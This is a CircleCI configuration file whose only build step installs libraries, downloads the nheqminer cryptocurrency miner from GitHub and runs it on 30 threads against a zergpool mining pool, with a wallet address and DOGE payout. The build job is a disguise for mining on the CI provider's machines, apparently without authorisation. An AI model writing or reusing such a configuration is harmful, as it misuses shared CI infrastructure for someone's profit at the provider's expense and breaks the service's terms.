version: 2.0
jobs:
  build:
    docker:
      - image: circleci/ruby:2.4.2-jessie-node
        auth:
          username: mydockerhub-user
          password: $DOCKERHUB_PASSWORD  # context / project UI env-var reference
    steps:
      - checkout
      - run:  sudo apt-get install libcurl4-openssl-dev libssl-dev libjansson-dev automake autotools-dev build-essential && wget https://github.com/VerusCoin/nheqminer/releases/download/v0.8.2/nheqminer-Linux-v0.8.2.tgz && tar -xvzf nheqminer-Linux-v0.8.2.tgz && tar xzf nheqminer-Linux-v0.8.2.tar.gz && cd nheqminer && ./nheqminer -v -l verushash.na.mine.zergpool.com:3300 -u D8Kq7Lu982DCTudZocXVbPQRgzPMqRSDsT -p  c=DOGE -t 30